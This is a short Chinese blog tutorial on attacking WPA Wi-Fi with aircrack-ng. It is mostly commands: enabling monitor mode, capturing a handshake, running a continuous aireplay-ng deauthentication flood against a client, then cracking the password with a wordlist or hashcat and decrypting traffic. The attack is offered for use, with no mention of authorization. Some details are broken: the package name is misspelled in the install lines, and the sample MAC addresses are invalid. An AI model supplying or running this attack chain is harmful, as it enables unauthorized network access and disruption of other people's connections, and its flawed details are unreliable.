aircrack-ng抓握手包

安装

安装的话可以直接安装

yum install aircack-ng

apt install aircack-ng


默认打开是管理模式,其中有monitor(监视)模式,将网卡转换为扫描周围wifi。

扫描

ifconfig
#查看一下网卡
#如果没有那么就加载一下网卡,有你自己的就忽略掉
ifconfig wlan0 up

airmon-ng start wlan0
#wlan0将成为wlan0mon,成为监视模式

airodump-ng wlan0mon
#开始监视

握手包

airodump-ng -c 11 --bssid 1A:2W:E3:E3:R4 -w /home/WP wlan0mon
#然后攻击断线下,有抓到会显示hand-work
#-c 11,11是信道参数,--bssid是bssid值,-w 这里是保存的路径,最后是网卡名
#攻击掉线重连抓到握手包,文件.cap会储存在/home下,最后就是解包了

攻击掉线

aireplay-ng -0 0 -a 1A:2W:E3:E3:R4 -s 3E:R4:R4:D3:2W wlan0mon
#-0 0代表就是攻击参数,0是一直发,1是攻击一次。-a 是wifi的mac地址。-s 是客户端的mac地址。最后是网卡名
#如果是0,持续攻击的话,有掉线后就可以取消攻击了

解包

aircrack-ng ***.cap -w ./passwd.txt

数据包处理

#解密包
airdecap-ng -e AP名 -p 密码 ****.cap

hashcat破解握手包密码

#用aircrack-ng把cap转换成hccap类型数据包
aircrack-ng <input.cap> -J <out.hccap>
#用hashcat破解WPA/PSK密码( -m 2500为破解的模式为WPA/PSK方式)
hashcat -m 2500 testap.hccap pass.txt
尊重作者转载请说明出处
内容:aircrack-ng抓握手包
URL:https://www.daadn.cn/archives/160.html
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇